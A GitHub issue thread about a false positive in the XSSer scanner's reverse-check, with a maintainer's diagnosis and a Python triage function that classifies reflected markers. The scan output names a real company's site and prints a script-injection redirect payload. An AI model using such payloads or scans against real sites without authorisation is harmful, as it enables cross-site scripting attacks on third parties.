epsylon / xsser

Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
https://xsser.03c8.net

XSSER --reverse-check is always successful! #56

Closed: geople closed this issue 4 years ago

geople commented 4 years ago

Example :

# xsser  -u "https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place=XSS" --reverse-check

 [ https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place=XSS ]

[!] Hashing:

 [ 444ef6f1117eff2584f0781a7f1a38f5 ] : [ place ]

[*] Trying:

https://www.starbucks.com/store-locator?map=38.947636%2C-94.683637%2C11z&place=%22%3E444ef6f1117eff2584f0781a7f1a38f5

---------------------------------------------

[+] Vulnerable(s):

 [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

---------------------------------------------

=============================================
[*] Injection(s) Results:
=============================================

 [ FOUND! ] -> [ 444ef6f1117eff2584f0781a7f1a38f5 ] : [ place ] -> [ ">PAYLOAD ]

-------------------------

[Info] Generating 'token' url:

https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place="><script>document.location=document.location.hash.substring(1)</script>"><script>document.location=document.location.hash.substring(1)</script>#http://localhost:19084/success/444ef6f1117eff2584f0781a7f1a38f5

==================================================

[Info] CONGRATULATIONS!!! <-> This vector is doing a remote connection... So, is: 100% VULNERABLE! ;-)

https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place=XSS

==================================================

==================================================
Mosquito(es) landed!
==================================================

===========================================================================
[*] Final Results:
===========================================================================

- Injections: 1
- Failed: 0
- Successful: 1
- Accur: 100.0 %

===========================================================================
[*] List of XSS injections:
===========================================================================

You have found: [ 1 ] XSS vector(s)! -> [100% VULNERABLE]

---------------------

[+] Target: https://www.starbucks.com/store-locator?map=38.947636,-94.683637,11z&place=XSS
[+] Vector: [ place ]
[!] Method: URL
[*] Hash: 444ef6f1117eff2584f0781a7f1a38f5
[*] Payload: https://www.starbucks.com/store-locator?map=38.947636%2C-94.683637%2C11z&place=%22%3E444ef6f1117eff2584f0781a7f1a38f5
[!] Vulnerable: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
[!] Status: XSS FOUND!
 --------------------------------------------------
epsylon commented 4 years ago

Hi @geople

It looks like a "false positive", directly related to the AJAX script used by the target to reply (but not related to --reverse-check), which isn't contemplated in our anti-false-positive filters:

"selectedStoreId":"1008953","expandedStoreId":null}},"router":{"location":{"pathname":"/store-locator/","search":"?map=38.947636%2C-94.683637%2C11z&place=%22%3E1e4ea2e8ba5b8aa31f2d4df677183ede","hash":"","key":"1q2coj","query":{"map":"38.947636%2C-94.683637%2C11z","place":"%22%3E1e4ea2e8ba5b8aa31f2d4df677183ede"}},"action":"POP"},"routes":{"current":{"pathname":"/store-locator/","hash":"","search":"?map=38.947636%2C-94.683637%2C11z&place=%22%3E1e4ea2e8ba5b8aa31f2d4df677183ede","state":{},"route":"/store-locator*","params":{"0":"/"},"query":{"map":"38.947636,-94.683637,11z","place":"\\">1e4ea2e8ba5b8aa31f2d4df677183ede"}

I will add a fix for it, soon.

Thanks for your report.
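The diagnosis in the comment above comes down to where the marker was reflected: inside a JSON string, with the injected quote escaped as \" or left URL-encoded as %22%3E, rather than in live markup. The following is an added triage check (my example, not XSSer's own code) that someone reviewing a scanner "FOUND" result could run over a captured response body; the sample bodies are constructed, and only the hash value is taken from the issue.

```python
import json
import re

# Breakout prefix the scanner prepended to its marker on the page ('">PAYLOAD',
# sent URL-encoded as %22%3E). Only a raw, unescaped copy of it in an HTML body
# means the injected quote actually closed an attribute or tag.
BREAKOUT = '">'

def reflection_context(body: str, marker: str, content_type: str = "text/html") -> str:
    """Triage a scanner hit by classifying how the marker came back.

    'none'    marker absent from the body
    'json'    body is a JSON/AJAX reply, so nothing in it is rendered as markup
    'encoded' every copy is preceded only by an escaped or URL-encoded breakout
              (\\">, %22%3E, &quot;&gt;), i.e. the quote was neutralised
    'html'    at least one copy is preceded by a raw '">' in an HTML body
    """
    hits = [m.start() for m in re.finditer(re.escape(marker), body)]
    if not hits:
        return "none"
    if content_type.split(";")[0].strip().lower() in ("application/json", "text/json"):
        return "json"
    for pos in hits:
        before = body[max(0, pos - len(BREAKOUT) - 1):pos]
        # '\">' is a JSON/JS string escape; '">' without a backslash is live markup.
        if before.endswith(BREAKOUT) and not before.endswith("\\" + BREAKOUT):
            return "html"
    return "encoded"

# Constructed samples (hash copied from the issue; the bodies are not real captures).
MARKER = "1e4ea2e8ba5b8aa31f2d4df677183ede"

# The situation in the issue: the marker sits in a JSON state blob, once
# URL-encoded (%22%3E) and once JSON-escaped (\">), served as application/json.
AJAX_REPLY = json.dumps({"router": {"location": {
    "search": "?map=38.947636%2C-94.683637%2C11z&place=%22%3E" + MARKER,
    "query": {"place": '">' + MARKER},
}}})

# The same blob embedded in an HTML page as inline state: still escaped, still inert.
INLINE_STATE = "<script>window.__STATE__=" + AJAX_REPLY + "</script>"

# A genuine attribute breakout: the quote and '>' survived into the markup.
REAL_BREAKOUT = '<input name="place" value="">' + MARKER + '">'

def triage_all():
    return {
        "ajax": reflection_context(AJAX_REPLY, MARKER, "application/json; charset=utf-8"),
        "inline": reflection_context(INLINE_STATE, MARKER),
        "real": reflection_context(REAL_BREAKOUT, MARKER),
        "absent": reflection_context("<p>no results</p>", MARKER),
    }
```

A scanner that only checks for the marker's presence reports all four the same way; the first two are exactly the false positive described in the comment.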

epsylon commented 4 years ago

This issue should be fixed after this commit: https://github.com/epsylon/xsser/commit/93897b24d37ca30b8507387d1cc9418a427e876f